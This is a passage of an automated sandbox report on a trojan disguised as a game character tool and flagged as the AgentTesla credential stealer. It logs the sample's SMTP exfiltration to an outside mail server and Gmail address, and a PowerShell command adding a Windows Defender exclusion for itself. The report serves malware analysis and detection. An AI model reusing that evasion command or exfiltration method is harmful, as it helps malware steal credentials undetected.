                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb6c480x53.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x6c00.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xb4ca40xb4e00False0.792902611006data7.45346682552IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xb80000x6c000x6c00False0.443250868056data5.09977998714IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xc00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0xb82000x668data
                                                                  RT_ICON0xb88780x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725
                                                                  RT_ICON0xb8b700x128GLS_BINARY_LSB_FIRST
                                                                  RT_ICON0xb8ca80xea8data
                                                                  RT_ICON0xb9b600x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                                  RT_ICON0xba4180x568GLS_BINARY_LSB_FIRST
                                                                  RT_ICON0xba9900x25a8data
                                                                  RT_ICON0xbcf480x10a8data
                                                                  RT_ICON0xbe0000x468GLS_BINARY_LSB_FIRST
                                                                  RT_GROUP_ICON0xbe4780x84data
                                                                  RT_VERSION0xbe50c0x4b4data
                                                                  RT_MANIFEST0xbe9d00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2008 - 2010
                                                                  Assembly Version1.3.0.0
                                                                  InternalNameStaticArrayInitTypeSize8.exe
                                                                  FileVersion1.3.0.0
                                                                  CompanyNameWHC
                                                                  LegalTrademarks
                                                                  CommentsA little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                                                  ProductNameRYL Character Tool - RoW EU version
                                                                  ProductVersion1.3.0.0
                                                                  FileDescriptionRYL Character Tool - RoW EU version
                                                                  OriginalFilenameStaticArrayInitTypeSize8.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  09/15/21-13:21:34.270587TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49843587192.168.2.464.202.184.79

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 15, 2021 13:21:33.254216909 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:33.362047911 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:33.362145901 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:33.548114061 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:33.549195051 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:33.657579899 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:33.658759117 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:33.767818928 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:33.769233942 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:33.910654068 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:33.914009094 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:34.022716999 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:34.023169041 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:34.160398006 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:34.160944939 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:34.268830061 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:34.269104004 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:34.270586967 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:34.270606995 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:34.271476030 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:34.271508932 CEST49843587192.168.2.464.202.184.79
                                                                  Sep 15, 2021 13:21:34.378480911 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:34.379081011 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:34.383564949 CEST5874984364.202.184.79192.168.2.4
                                                                  Sep 15, 2021 13:21:34.437508106 CEST49843587192.168.2.464.202.184.79

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 15, 2021 13:19:24.990336895 CEST4991053192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:19:25.022460938 CEST53499108.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:19:56.725431919 CEST5585453192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:19:56.759756088 CEST53558548.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:17.908987045 CEST6454953192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:17.936649084 CEST53645498.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:18.140039921 CEST6315353192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:18.183633089 CEST53631538.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:18.754012108 CEST5299153192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:18.783638954 CEST53529918.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:19.379167080 CEST5370053192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:19.385653973 CEST5172653192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:19.425307989 CEST53537008.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:19.430901051 CEST53517268.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:19.894576073 CEST5679453192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:19.961726904 CEST53567948.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:20.575283051 CEST5653453192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:20.606513023 CEST53565348.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:21.067455053 CEST5662753192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:21.129257917 CEST53566278.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:21.805939913 CEST5662153192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:21.830523014 CEST53566218.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:22.887830019 CEST6311653192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:22.914562941 CEST53631168.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:25.094150066 CEST6407853192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:25.127880096 CEST53640788.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:25.557903051 CEST6480153192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:25.584700108 CEST53648018.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:20:35.569762945 CEST6172153192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:20:35.595983028 CEST53617218.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:21:06.131310940 CEST5125553192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:21:06.162621021 CEST53512558.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:21:08.280268908 CEST6152253192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:21:08.306998014 CEST53615228.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:21:32.830818892 CEST5233753192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:21:32.950429916 CEST53523378.8.8.8192.168.2.4
                                                                  Sep 15, 2021 13:21:32.979581118 CEST5504653192.168.2.48.8.8.8
                                                                  Sep 15, 2021 13:21:33.095629930 CEST53550468.8.8.8192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Sep 15, 2021 13:21:32.830818892 CEST192.168.2.48.8.8.80xc653Standard query (0)mail.insergejk.comA (IP address)IN (0x0001)
                                                                  Sep 15, 2021 13:21:32.979581118 CEST192.168.2.48.8.8.80x4b7eStandard query (0)mail.insergejk.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Sep 15, 2021 13:21:32.950429916 CEST8.8.8.8192.168.2.40xc653No error (0)mail.insergejk.cominsergejk.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 15, 2021 13:21:32.950429916 CEST8.8.8.8192.168.2.40xc653No error (0)insergejk.com64.202.184.79A (IP address)IN (0x0001)
                                                                  Sep 15, 2021 13:21:33.095629930 CEST8.8.8.8192.168.2.40x4b7eNo error (0)mail.insergejk.cominsergejk.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 15, 2021 13:21:33.095629930 CEST8.8.8.8192.168.2.40x4b7eNo error (0)insergejk.com64.202.184.79A (IP address)IN (0x0001)

                                                                  SMTP Packets

                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                  Sep 15, 2021 13:21:33.548114061 CEST5874984364.202.184.79192.168.2.4220-servidor1.publinet.pe ESMTP Exim 4.94.2 #2 Wed, 15 Sep 2021 06:21:33 -0500
                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                  220 and/or bulk e-mail.
                                                                  Sep 15, 2021 13:21:33.549195051 CEST49843587192.168.2.464.202.184.79EHLO 116938
                                                                  Sep 15, 2021 13:21:33.657579899 CEST5874984364.202.184.79192.168.2.4250-servidor1.publinet.pe Hello 116938 [84.17.52.51]
                                                                  250-SIZE 209715200
                                                                  250-8BITMIME
                                                                  250-PIPELINING
                                                                  250-PIPE_CONNECT
                                                                  250-AUTH PLAIN LOGIN
                                                                  250-STARTTLS
                                                                  250 HELP
                                                                  Sep 15, 2021 13:21:33.658759117 CEST49843587192.168.2.464.202.184.79AUTH login YWRtaW5pc3RyYWNpb25AaW5zZXJnZWprLmNvbQ==
                                                                  Sep 15, 2021 13:21:33.767818928 CEST5874984364.202.184.79192.168.2.4334 UGFzc3dvcmQ6
                                                                  Sep 15, 2021 13:21:33.910654068 CEST5874984364.202.184.79192.168.2.4235 Authentication succeeded
                                                                  Sep 15, 2021 13:21:33.914009094 CEST49843587192.168.2.464.202.184.79MAIL FROM:<administracion@insergejk.com>
                                                                  Sep 15, 2021 13:21:34.022716999 CEST5874984364.202.184.79192.168.2.4250 OK
                                                                  Sep 15, 2021 13:21:34.023169041 CEST49843587192.168.2.464.202.184.79RCPT TO:<miguel007carlos@gmail.com>
                                                                  Sep 15, 2021 13:21:34.160398006 CEST5874984364.202.184.79192.168.2.4250 Accepted
                                                                  Sep 15, 2021 13:21:34.160944939 CEST49843587192.168.2.464.202.184.79DATA
                                                                  Sep 15, 2021 13:21:34.269104004 CEST5874984364.202.184.79192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                  Sep 15, 2021 13:21:34.271508932 CEST49843587192.168.2.464.202.184.79.
                                                                  Sep 15, 2021 13:21:34.383564949 CEST5874984364.202.184.79192.168.2.4250 OK id=1mQSyt-0000GF-E2

                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:13:19:30
                                                                  Start date:15/09/2021
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                                                                  Imagebase:0x230000
                                                                  File size:769536 bytes
                                                                  MD5 hash:F116C183D3684FE8C6D8435AEF94FD41
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:13:19:46
                                                                  Start date:15/09/2021
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                                                                  Imagebase:0x1120000
                                                                  File size:430592 bytes
                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:19:47
                                                                  Start date:15/09/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff724c50000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:19:47
                                                                  Start date:15/09/2021
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  Imagebase:0x6f0000
                                                                  File size:769536 bytes
                                                                  MD5 hash:F116C183D3684FE8C6D8435AEF94FD41
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Executed Functions

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02459D6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: eeeabf7fb460906a58d62b35d1f224ebaaa6cb34018bc68525c8d6599624f225
                                                                    • Instruction ID: d55e76fd3e6c6967f8a354005f4d70ddb452385937b63e6da1788af673a79da8
                                                                    • Opcode Fuzzy Hash: eeeabf7fb460906a58d62b35d1f224ebaaa6cb34018bc68525c8d6599624f225
                                                                    • Instruction Fuzzy Hash: 19712270A00B15CFDB64DF6AC09479BB7F5BF88204F00892AD49A9BB41D735E845CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 02455B41
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: fed45d72d522c5af34dc1e408981243dbad2df3126dddb4d0e8168671055e69c
                                                                    • Instruction ID: 1b3f437c21832a5457e70e4df9290dece4c797b08754463e6189907e4d185d34
                                                                    • Opcode Fuzzy Hash: fed45d72d522c5af34dc1e408981243dbad2df3126dddb4d0e8168671055e69c
                                                                    • Instruction Fuzzy Hash: 1541F6B0D0071CCBDB24CF99C8487EEBBB5BF48308F54855AD409AB251D7716945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 02455B41
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 7f89e5d15650c0c7731ee8d9306191c2557b9bb165b283f3435832271a39421b
                                                                    • Instruction ID: a067558d4c2deeba7d17404f66df2706c69c9d11754b5f5101e5ff4177e13161
                                                                    • Opcode Fuzzy Hash: 7f89e5d15650c0c7731ee8d9306191c2557b9bb165b283f3435832271a39421b
                                                                    • Instruction Fuzzy Hash: 4B4104B0D0075CCBDB24CFA9C8447EEBBB5BF48308F64856AD848AB251D7755945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0245BFF6,?,?,?,?,?), ref: 0245C0B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: ef0cf7d9f4dbe43945bb1326d6c0526c2199b76819db18929a8fe560bbbb358a
                                                                    • Instruction ID: 1ab04cc76e982986d995b49db3b1479a9a5993efd814a31b885917d14097127d
                                                                    • Opcode Fuzzy Hash: ef0cf7d9f4dbe43945bb1326d6c0526c2199b76819db18929a8fe560bbbb358a
                                                                    • Instruction Fuzzy Hash: 8C2103B59003189FDB10CF9AD484AEEBBF8EB48324F14841AE954A3310C378A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0245BFF6,?,?,?,?,?), ref: 0245C0B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 5edee21a0d79ae68c43fc3cf3a010be1ecec74a0f55a05b012d584568eb5e402
                                                                    • Instruction ID: 59079b4a677535ebdc6568d693f284f1f9cd25bccd53eb1af6f95057a501a33e
                                                                    • Opcode Fuzzy Hash: 5edee21a0d79ae68c43fc3cf3a010be1ecec74a0f55a05b012d584568eb5e402
                                                                    • Instruction Fuzzy Hash: F121E3B59002599FDB10CFA9D984AEEBBF4EF48324F14841AE955A3310C378A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02459DE9,00000800,00000000,00000000), ref: 02459FFA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 5c9dd162294df012344c0248927c27e64fb5cd64be9e5ec0eb5f09819aa67649
                                                                    • Instruction ID: 614b727b4d7cdf033b72743532d55a63cd4147149fdb0e8c5de271ba5d556900
                                                                    • Opcode Fuzzy Hash: 5c9dd162294df012344c0248927c27e64fb5cd64be9e5ec0eb5f09819aa67649
                                                                    • Instruction Fuzzy Hash: 8F1106B6D003189FDB10CF9AD444BEEFBF4EB48318F14842AE955A7200C375A545CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02459D6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 2ce6e44b55e7beeaddba7f05b597f83a2ca3a54ab00ec524397ec0a9f7257d15
                                                                    • Instruction ID: d7f371db5192a5c6c661840b5c904fb37b7e17ce07457d99e14253486ea9e2d7
                                                                    • Opcode Fuzzy Hash: 2ce6e44b55e7beeaddba7f05b597f83a2ca3a54ab00ec524397ec0a9f7257d15
                                                                    • Instruction Fuzzy Hash: 8111DFB5D007598FCB10CF9AD444BDEFBF8AB88224F14852AD869A7610C379A549CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7d083a01b4c741a2cfc331d61fc65edbffe3cfa7746ec68b77382589d264e18
                                                                    • Instruction ID: 6d04981e37c305d916b30c420d99f43a12059a5ec982298796fbe0570f1216c0
                                                                    • Opcode Fuzzy Hash: e7d083a01b4c741a2cfc331d61fc65edbffe3cfa7746ec68b77382589d264e18
                                                                    • Instruction Fuzzy Hash: B212C2F1C917468BE318DF65E9881893BA1F744328FD04A28DA712FAD4D7B8116ECF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 099be60e1a843ede91d58101eafe4911ac1691dab230aed8a4440e6ca589afa3
                                                                    • Instruction ID: caab2e503398e1403b13b236256798300803636cad1fd17faec2135ff7889c35
                                                                    • Opcode Fuzzy Hash: 099be60e1a843ede91d58101eafe4911ac1691dab230aed8a4440e6ca589afa3
                                                                    • Instruction Fuzzy Hash: 57A16F32E00229CFCF15DFA5C88459EBBB2FF85304B15856BE955BB222DB31A945CF80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d58fc6764455bf5a59fe4d04f7e62178cf5d6cf5a89157e7c622b10e1d81f246
                                                                    • Instruction ID: 4eea5c9c74b98e5e69acff5b472f3feb76926bc57dde802a332c0133bd62b1c7
                                                                    • Opcode Fuzzy Hash: d58fc6764455bf5a59fe4d04f7e62178cf5d6cf5a89157e7c622b10e1d81f246
                                                                    • Instruction Fuzzy Hash: D2C137F1C917468BE318DF65E9881893BB1FB85328F904A28DA712F6D4D7B4106ECF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 39%
                                                                    			E00235FE1(intOrPtr* __eax, signed int __ebx, void* __ecx, void* __edx, signed int* __edi, intOrPtr* __esi) {
                                                                    				intOrPtr* _t6;
                                                                    				intOrPtr* _t7;
                                                                    				intOrPtr* _t8;
                                                                    				intOrPtr* _t9;
                                                                    				intOrPtr* _t10;
                                                                    				signed int _t21;
                                                                    				signed int _t22;
                                                                    
                                                                    				_push(es);
                                                                    				asm("adc esi, [eax]");
                                                                    				_t6 = __eax -  *__eax +  *((intOrPtr*)(__eax -  *__eax));
                                                                    				asm("sahf");
                                                                    				 *_t6 =  *_t6 + _t6;
                                                                    				 *__edi =  *__edi + _t6;
                                                                    				 *_t6 =  *_t6 + _t6;
                                                                    				asm("adc [ebx], ebp");
                                                                    				_t7 = _t6 +  *__esi;
                                                                    				_push(ss);
                                                                    				 *_t7 =  *_t7 + _t7;
                                                                    				_t8 = _t7 -  *((intOrPtr*)(__edi + _t7 + 0x1f));
                                                                    				asm("popad");
                                                                    				_t22 = _t21 |  *__ebx;
                                                                    				asm("invd");
                                                                    				_pop(ds);
                                                                    				_push(_t8);
                                                                    				asm("popad");
                                                                    				 *_t8 =  *_t8 + _t8;
                                                                    				 *__edi =  *__edi | __ebx;
                                                                    				_t9 = _t8 -  *((intOrPtr*)(_t22 + 0x1f));
                                                                    				asm("sbb cl, [ebx+ebp]");
                                                                    				asm("in al, dx");
                                                                    				asm("rcl byte [ecx], 1");
                                                                    				 *__esi =  *__esi + _t9;
                                                                    				_pop(ds);
                                                                    				asm("sbb [ebx+ebp], ecx");
                                                                    				asm("loope 0x9");
                                                                    				_pop(ds);
                                                                    				_t10 = _t9;
                                                                    				 *_t10 =  *_t10 + _t10;
                                                                    				asm("sldt word [eax]");
                                                                    				 *_t10 =  *_t10 + __ebx;
                                                                    				 *_t10 =  *_t10 + _t10;
                                                                    				 *((intOrPtr*)(__edx + 1)) =  *((intOrPtr*)(__edx + 1)) + _t10;
                                                                    				 *_t10 =  *_t10 + _t10;
                                                                    				_push(_t22 + 1);
                                                                    				 *_t10 =  *_t10 + _t10;
                                                                    				 *__edi =  *__edi + __ebx;
                                                                    				asm("sbb ecx, [ebx+ebp]");
                                                                    				return _t10;
                                                                    			}










                                                                    0x00235fe1
                                                                    0x00235fe4
                                                                    0x00235fe6
                                                                    0x00235fe8
                                                                    0x00235fe9
                                                                    0x00235feb
                                                                    0x00235fed
                                                                    0x00235fef
                                                                    0x00235ff1
                                                                    0x00235ff3
                                                                    0x00235ff4
                                                                    0x00235ff6
                                                                    0x00235ffb
                                                                    0x00235ffc
                                                                    0x00235ffe
                                                                    0x00236000
                                                                    0x00236001
                                                                    0x00236002
                                                                    0x00236006
                                                                    0x00236008
                                                                    0x0023600c
                                                                    0x0023600f
                                                                    0x00236012
                                                                    0x00236013
                                                                    0x00236016
                                                                    0x00236018
                                                                    0x0023601a
                                                                    0x0023601d
                                                                    0x0023601f
                                                                    0x00236023
                                                                    0x00236025
                                                                    0x00236027
                                                                    0x0023602a
                                                                    0x0023602c
                                                                    0x0023602e
                                                                    0x00236031
                                                                    0x00236033
                                                                    0x00236034
                                                                    0x00236036
                                                                    0x00236038
                                                                    0x0023603b

                                                                    Memory Dump Source
